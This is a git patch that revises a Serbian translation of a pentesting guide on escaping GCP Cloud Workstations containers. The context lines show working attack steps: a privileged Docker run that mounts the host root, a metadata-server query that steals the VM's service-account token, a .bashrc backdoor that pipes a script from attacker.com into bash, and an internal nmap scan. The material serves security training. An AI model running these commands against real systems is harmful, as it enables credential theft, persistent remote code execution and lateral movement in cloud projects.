From f909c9967d7eea2c81690207affbeb2eb25d0355 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Tue, 3 Mar 2026 15:47:08 +0000
Subject: [PATCH] Translated ['',
 'src/pentesting-cloud/gcp-security/gcp-privilege-escalat

---
 .../gcp-cloud-workstations-privesc.md         | 39 +++++++++++--------
 1 file changed, 22 insertions(+), 17 deletions(-)

diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
index 0819441ba..7822021c8 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
@@ -1,22 +1,23 @@
 # GCP - Cloud Workstations Privesc
 
+{{#include ../../../banners/hacktricks-training.md}}
 
 ### Container Breakout via Docker Socket (Container -> VM -> Project)
 
-Primarni put za eskalaciju privilegija u Cloud Workstations proističe iz potrebe da se podrže **Docker-in-Docker (DinD)** workflows za developere. Kada konfiguracija workstation-a montira Docker socket ili dozvoljava privileged containers (uobičajena konfiguracija), napadač unutar workstation kontejnera može pobeći na podložni Compute Engine VM i ukrasti njegov service account token.
+Primarni put eskalacije privilegija u Cloud Workstations potiče iz potrebe da se podrže **Docker-in-Docker (DinD)** workflows za developere. Kada konfiguracija workstation-a montira Docker socket ili omogućava privileged containers (uobičajena konfiguracija), napadač unutar workstation containera može pobjeći na osnovni Compute Engine VM i ukrasti njegov service account token.
 
-**Preduslovi:**
-- Pristup Cloud Workstation terminalu (putem SSH, kompromitovane sesije, ili ukradenih kredencijala)
+**Prerequisites:**
+- Pristup Cloud Workstation terminalu (putem SSH, kompromitovane sesije, ili ukradenih akreditiva)
 - Konfiguracija workstation-a mora montirati `/var/run/docker.sock` ili omogućiti privileged containers
 
-**Arhitektonski kontekst:** Workstation je kontejner (Layer 3) koji se izvršava na Docker/Containerd runtime-u (Layer 2) na GCE VM-u (Layer 1). Docker socket daje direktan pristup host-ovom container runtime-u.
+**Architecture context:** The workstation is a container (Layer 3) running on a Docker/Containerd runtime (Layer 2) on a GCE VM (Layer 1). The Docker socket gives direct access to the host's container runtime.
 
 > [!NOTE]
-> Alat [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) automatizuje kompletan container escape i otvara vam root shell na host VM-u.
+> The tool [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) automates the full container escape and drops you into a root shell on the host VM.
 
 <details>
 
-<summary>Korak 1: Proverite Docker socket</summary>
+<summary>Korak 1: Provera Docker socketa</summary>
 ```bash
 # Verify the Docker socket is available
 ls -l /var/run/docker.sock
@@ -26,9 +27,9 @@ ls -l /var/run/docker.sock
 
 <details>
 
-<summary>Korak 2: Bekstvo u fajl sistem host VM-a</summary>
+<summary>Korak 2: Pobegnite na fajl-sistem host VM-a</summary>
 
-Pokrećemo privilegovani kontejner, montirajući korenski direktorijum hosta na `/mnt/host`. Takođe delimo mrežu hosta i PID namespace kako bismo maksimizirali vidljivost.
+Pokrećemo privilegovani kontejner, montirajući root direktorijum hosta u `/mnt/host`. Takođe delimo mrežu i PID namespace hosta da bismo maksimalno povećali vidljivost.
 ```bash
 # Spawn a privileged container mounting the host's root filesystem
 docker run -it --rm --privileged --net=host --pid=host \
@@ -38,13 +39,13 @@ alpine sh
 # Inside the new container, chroot into the host
 chroot /mnt/host /bin/bash
 ```
-Sada imate **root shell na osnovnom Compute Engine VM** (Layer 1).
+Sada imate **root shell na osnovnom Compute Engine VM-u** (Sloj 1).
 
 </details>
 
 <details>
 
-<summary>Korak 3: Steal the VM service account token from IMDS</summary>
+<summary>Korak 3: Ukradi VM service account token iz IMDS</summary>
 ```bash
 # From the host VM, query the Instance Metadata Service
 curl -s -H "Metadata-Flavor: Google" \
@@ -61,16 +62,16 @@ http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scop
 </details>
 
 > [!CAUTION]
-> **Proverite pristupne scope-ove!**
-> Čak i ako je priloženi Service Account **Editor**, VM može biti ograničen pristupnim scope-ovima.
-> Ako vidite `https://www.googleapis.com/auth/cloud-platform`, imate pun pristup.
-> Ako vidite samo `logging.write` i `monitoring.write`, ograničeni ste na vektore **Network Pivot** i **Persistence** navedene dole.
+> **Proverite opsege pristupa!**
+> Čak i ako je priloženi Service Account je **Editor**, VM može biti ograničen opsezima pristupa.
+> Ako vidite `https://www.googleapis.com/auth/cloud-platform`, imate potpuni pristup.
+> Ako vidite samo `logging.write` i `monitoring.write`, ograničeni ste na **Network Pivot** i **Persistence** vektore u nastavku.
 
 <details>
 
 <summary>Korak 4: Achieve Persistence (Backdoor the User)</summary>
 
-Cloud Workstations montiraju persistent disk na `/home/user`. Pošto se container user (obično `user`, UID 1000) poklapa sa host user-om (UID 1000), možete pisati u home direktorijum hosta. Ovo vam omogućava da ubacite backdoor u okruženje čak i ako se workstation container ponovo izgradi.
+Cloud Workstations montiraju persistent disk na `/home/user`. Pošto se container user (obično `user`, UID 1000) poklapa sa host user-om (UID 1000), možete pisati u host-ov home direktorijum. Ovo vam omogućava da backdoor-ujete okruženje čak i ako se workstation container ponovo izgradi.
 ```bash
 # Check if you can write to the host's persistent home
 ls -la /mnt/host/home/user/
@@ -83,9 +84,9 @@ echo "curl http://attacker.com/shell | bash" >> /mnt/host/home/user/.bashrc
 
 <details>
 
-<summary>Step 5: Network Pivot (Internal VPC Access)</summary>
+<summary>Korak 5: Network Pivot (Internal VPC Access)</summary>
 
-Pošto delite host network namespace (`--net=host`), sada ste pouzdan čvor u VPC-u. Možete skenirati interne servise koji dozvoljavaju pristup na osnovu IP whitelisting-a.
+Pošto delite host network namespace (`--net=host`), sada ste pouzdani čvor na VPC-u. Možete skenirati interne servise koji omogućavaju pristup na osnovu IP whitelisting-a.
 ```bash
 # Install scanning tools on the host (if internet access allows)
 apk add nmap
@@ -94,3 +95,7 @@ apk add nmap
 nmap -sS -p 80,443,22 10.0.0.0/8
 ```
 </details>
+
+
+
+{{#include ../../../banners/hacktricks-training.md}}